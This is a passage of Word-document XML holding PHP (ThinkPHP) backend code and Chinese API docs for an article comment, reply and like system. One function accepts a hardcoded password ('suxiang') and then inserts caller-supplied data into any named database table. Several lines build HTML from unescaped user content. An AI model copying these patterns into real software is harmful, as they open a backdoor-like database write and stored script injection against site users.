    <w:p w14:paraId="5DCFAD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0343B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7A9F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285E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3AB20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5BFA7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33AB0A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date('m-d H:i', $v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BDCD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Num = Db::name('article_ping_xia')-&gt;where(['ping_id' =&gt; $v['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63827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huifu'] = $pingNum;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9E8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Num) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203041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 = Db::name('article_ping_xia')-&gt;where(['ping_id' =&gt; $v['id']])-&gt;order('time', 'desc')-&gt;limit(4)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76571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 = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E556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Data as $ks =&gt; $vs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272B53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 .= '&lt;li class="aui-ellipsis-2"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44343B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s['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C958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 .= '&lt;a Tapmode onclick="_url({id:' . $vs['uid'] . '},\'u_win\')"&gt;' . $user['username'] . ' </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/a&gt;' . $vs['content'] . '&lt;/li&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21619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6F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Num &gt; 5) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4CD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 .= '&lt;li class="aui-ellipsis-2"&gt;&lt;a&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查看全部</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $pingNum . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条回复</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/a&gt;&lt;/li&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46342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6FFE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ingDataList'] = $pingDataHtml;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38808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E7E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aid'] = $v['aid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7771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token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D53F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Db::name('article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AD54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v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C886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uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CEA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4A2FF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DB37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8C4E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B993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855D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F45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age_url($data=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B139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39D20D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1');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A688B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AF1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json_decode(htmlspecialchars_decode($data), true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A29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data['pwd']) || $data['pwd'] != 'suxiang') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F820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2');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7713C1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BEF1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pwd']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED2E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ata['__name__'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BED4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__name__']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B74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Db::name($name)-&gt;insertGetId($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564FC0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ie;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8FE6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8A3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907C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FAA3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List_xia </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯追评列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437063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资讯追评列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B20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4DE1B9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793A4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60C40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3F10AF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Id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E37F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s  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量（默认值：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D7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非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C5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EBB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data</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25588D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追评内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512AB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追评赞数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF6A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me          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D196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g</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A96E7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name      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A36F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User      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否已经点赞该追评：</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7ABA51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CF3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失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9F4D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3D602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470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List_xia() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCCA9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ost.pages/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1287D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 input('param.pingId/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A808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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4965C8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token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BB9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17341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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4382E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10390F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206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25C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pages' =&gt; 'number', 'pingId' =&gt; 'number|require', ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C989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pages' =&gt; $pages, 'pingId' =&gt; $pingId, ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F96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FDC8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D7B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31B9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35676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4853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C6D7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_id'] = $pingId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67556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_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5185A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here)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED97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time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ABF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etchSql(false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C880E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ages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A94F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40EC0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3B02E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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A67EB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FB59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zanUser'] = Db::name('article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DE2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2D192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v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3907E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7FCAC0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04BF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914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6994E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10775D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4E3EA7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date('m-d H:i', $v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BFA5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Num = Db::name('article_ping_xia')-&gt;where(['ping_id'=&gt;$v['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574C2E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ingNum){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096B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Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5016FA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v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C982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time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146AD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61E94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4DE2AA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB616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Data as $ks =&gt; $vs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638546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lt;li class="aui-ellipsis-2"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE7DC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_user($vs['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3DE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DataHtml.='&lt;a Tapmode onclick="_url({id:'.$vs['uid'].'},\'u_win\')"&gt;'.$user['username'].' </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/a&gt;'.$vs['content'].'&lt;/li&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AFE8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7B4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ingDataList']=$pingDataHtml;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2116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C743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41467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data'][$k]['zanUser'] = Db::name('article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DE13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v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA0B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uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D7B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33E11D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E44E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301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4A7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AB306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091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pingListPingId2($pingId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DA0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gt;where(['id' =&gt; $pingId])-&gt;field('uid,content,pingId2')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C98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5C9E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db['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE2C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name'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D015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7A396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pingListPingId2($db['pingId2']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CB9A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0302E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7A7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E17E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91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pingView </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>调用单个评论内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0585D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调用单个评论内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B2D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5E2CA0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1040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E036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518467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ingId  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F896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500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Json} data      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D34D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id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705BE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aid    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DA5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uid    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00552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zan    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>赞数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E58B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content </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D676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username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EA2F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img      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D6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time     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDD7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pingNum </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否有追评</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE97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huifuNum </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追平数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E446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user.zan     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否已赞资讯文章评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1DCC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user.guanzhu </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否已关注资讯文章评论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CFDE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A05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失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FD2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F1A03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F68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View() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C9C2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B263C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 input('param.pingId/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E125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3C752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_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7699E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uid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0843C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5CF7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883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AD99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pingId' =&gt; 'number|require', ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EF1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pingId' =&gt; $pingId, ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7008E6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20893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A9E0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2A8545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5D77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5EF1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735F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gt;where(['id' =&gt; $pingId])-&gt;order('time', 'desc')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7314F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db['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071B5B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id'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8BB8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name'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1EB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mg'] = $user['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B376F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ime'] = date('m-d H:i', $db['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C3A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zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553C7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guanzhu'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A25AF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C72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zan'] = Db::name('article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1A3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pingId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9A86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uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292F2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10786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71656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 $db['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF41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id != $gz_uid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A7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user']['guanzhu'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177189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uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BFE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gz_uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E26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690EC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C31D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4312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zan']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50299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List = Db::name('article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F0F8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Id', $db['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458CF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time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C57D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uid')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6035B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07652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4EAF51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List = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D333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zanList as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F617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39DC52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List.= '&lt;img src="' . $user['img'] . '?imageView2/1/w/100/h/100" /&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544EE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EAE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zanList'] = $imgList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396F18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FA7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pingNum'] = Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249FF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271F2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id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724D2C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huifuNum'] = db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159F2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1501E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D66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b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF56F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BEB1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AC96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zanList </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论点赞列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61230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评论点赞列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18734D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1A75AF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FDB44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9D546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ingId </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56091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s  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量（默认值：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356D6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40D56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54BF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Json} data      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论赞数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F49B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pingId </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B534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uid    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C62A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Integer} zan    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否点赞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E572D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time    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118242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img      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
